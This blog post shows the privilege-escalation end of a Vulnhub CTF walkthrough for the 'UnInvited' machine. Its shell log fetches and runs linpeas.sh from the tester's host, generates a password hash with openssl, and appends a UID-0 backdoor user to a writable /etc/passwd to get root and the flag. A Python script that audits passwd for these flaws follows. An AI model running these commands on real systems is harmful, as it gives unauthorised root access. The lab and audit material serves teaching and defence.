 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Mar  4 14:46:34 IST 2023

  System load:                    0.0
  Usage of /:                     1.3% of 313.03GB
  Memory usage:                   35%
  Swap usage:                     0%
  Processes:                      128
  Users logged in:                0
  IP address for enp0s3:          192.168.56.146
  IP address for docker0:         172.17.0.1
  IP address for br-3a300780bc7a: 172.18.0.1

  => There is 1 zombie process.


287 packages can be updated.
176 updates are security updates.


#########################################################

             ____             ____  __ ________      .___
 __ __  ____/_   | _______  _/_   |/  |\_____  \   __| _/
|  |  \/    \|   |/    \  \/ /|   \   __\_(__  <  / __ | 
|  |  /   |  \   |   |  \   / |   ||  | /       \/ /_/ | 
|____/|___|  /___|___|  /\_/  |___||__|/______  /\____ | 
           \/         \/                      \/      \/ 


!!!!!!!!!!!!!!!!!!WECOME TO THE PARTY!!!!!!!!!!!!!!!!!!!!!


#########################################################



()()()()()()()()()()()()()()()()()()()()()()()()()()()()()



Last login: Fri Jul 31 10:36:15 2020 from 192.168.1.101
docksec@uninvited:~$ id
uid=1001(docksec) gid=1001(docksec) groups=1001(docksec)
docksec@uninvited:~$ 

docksec@uninvited:/home/jeevan$ cd /tmp
docksec@uninvited:/tmp$ wget http://192.168.56.206:8000/linpeas.sh
--2023-03-04 14:50:16--  http://192.168.56.206:8000/linpeas.sh
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 765823 (748K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh                      100%[=====================================================>] 747.87K  --.-KB/s    in 0.003s  

2023-03-04 14:50:16 (255 MB/s) - ‘linpeas.sh’ saved [765823/765823]

docksec@uninvited:/tmp$ chmod +x linpeas.sh
docksec@uninvited:/tmp$ ./linpeas.sh 

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d                                    
                                                                                                                              
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable                                                             
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No                                                                                  
═╣ Can I read shadow plists? ............ No                                                                                  
═╣ Can I write shadow plists? ........... No                                                                                  
═╣ Can I read opasswd file? ............. No                                                                                  
═╣ Can I write in network-scripts? ...... No                                                                                  
═╣ Can I read root folder? .............. No                  
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ openssl passwd -6 -salt jason 123456
$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41

Create a password hash, then append a new user entry carrying that hash to /etc/passwd.

docksec@uninvited:/tmp$ echo 'jason:$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41:0:0:root:/root:/bin/bash' >> /etc/passwd
docksec@uninvited:/tmp$ su - jason
Password: 
root@uninvited:~# cd /root
root@uninvited:~# ls -alh
total 44K
drwx------  6 root root 4.0K Jul 29  2020 .
drwxr-xr-x 23 root root 4.0K Jul 28  2020 ..
-rw-------  1 root root 3.5K Jul 30  2020 .bash_history
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwx------  2 root root 4.0K Jul 29  2020 .cache
drwx------  3 root root 4.0K Jul 29  2020 .gnupg
drwxr-xr-x  3 root root 4.0K Jul 28  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwxr-xr-x  3 root root 4.0K Jul 28  2020 ProjectX
-rw-r--r--  1 root root  376 Jul 28  2020 root.txt
-rw-r--r--  1 root root   66 Jul 28  2020 .selected_editor
root@uninvited:~# cat root.txt
             .__            .__  __             .___ 
 __ __  ____ |__| _______  _|___/  |_  ____   __| _/ 
|  |  \/    \|  |/    \  \/ |  \   ___/ __ \ / __ |  
|  |  |   |  |  |   |  \   /|  ||  | \  ___// /_/ |  
|____/|___|  |__|___|  /\_/ |__||__|  \___  \____ |  
           \/        \/                   \/     \/
FLAG{58DSFJ74RFWESD8J2LKJGHJ87ER4QREWRFLMSTDCMGKAASD}
root@uninvited:~# 

Finally, a root shell and the root flag were obtained.
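The escalation worked because of three conditions linpeas already hinted at: /etc/passwd writable by a non-root user, a password hash accepted in the passwd field instead of /etc/shadow, and a second UID-0 account. The following Python audit is an added example (not from the original write-up) that checks for all three; the sample passwd content is constructed, with the appended 'jason' line carrying a placeholder instead of the real hash.

```python
"""Audit /etc/passwd for the weaknesses used in the escalation above.

Added example, not from the original write-up. SAMPLE_PASSWD is constructed;
the 'jason' entry mirrors the one appended in the write-up with its hash
replaced by a placeholder.
"""
import os
import stat
from typing import List, NamedTuple


class Finding(NamedTuple):
    severity: str
    message: str


def audit_passwd_lines(lines: List[str]) -> List[Finding]:
    """Parse passwd(5) entries and flag backdoor-style anomalies."""
    findings: List[Finding] = []
    uid0_users: List[str] = []
    seen_names = set()
    for lineno, raw in enumerate(lines, 1):
        line = raw.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(Finding("high", f"line {lineno}: malformed entry ({len(fields)} fields)"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if name in seen_names:
            findings.append(Finding("medium", f"line {lineno}: duplicate user name {name!r}"))
        seen_names.add(name)
        if pw == "":
            findings.append(Finding("high", f"line {lineno}: empty password field for {name!r}"))
        elif pw not in ("x", "*", "!"):
            # A real hash here bypasses /etc/shadow: whoever can write passwd
            # chooses the password, exactly as done with 'jason' above.
            findings.append(Finding("high", f"line {lineno}: password hash stored in passwd for {name!r}"))
        if uid == "0":
            uid0_users.append(name)
    # Exactly one UID-0 account (root) is expected on a stock system.
    for name in uid0_users:
        if name != "root":
            findings.append(Finding("critical", f"extra UID 0 account: {name!r}"))
    return findings


def audit_passwd_file(path: str = "/etc/passwd") -> List[Finding]:
    """Combine the content checks with ownership/permission checks on the live file."""
    st = os.stat(path)
    findings: List[Finding] = []
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(Finding("critical", f"{path} is group/world writable ({oct(st.st_mode & 0o777)})"))
    if st.st_uid != 0:
        findings.append(Finding("critical", f"{path} is not owned by root (uid {st.st_uid})"))
    with open(path) as fh:
        findings.extend(audit_passwd_lines(fh.readlines()))
    return findings


# Constructed sample: a normal system plus the appended 'jason' entry.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
docksec:x:1001:1001::/home/docksec:/bin/bash
jason:$6$jason$<HASH-PLACEHOLDER>:0:0:root:/root:/bin/bash
"""

if __name__ == "__main__":
    for f in audit_passwd_lines(SAMPLE_PASSWD.splitlines()):
        print(f"[{f.severity}] {f.message}")
```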

posted @ 2023-03-04 17:59  Jason_huawen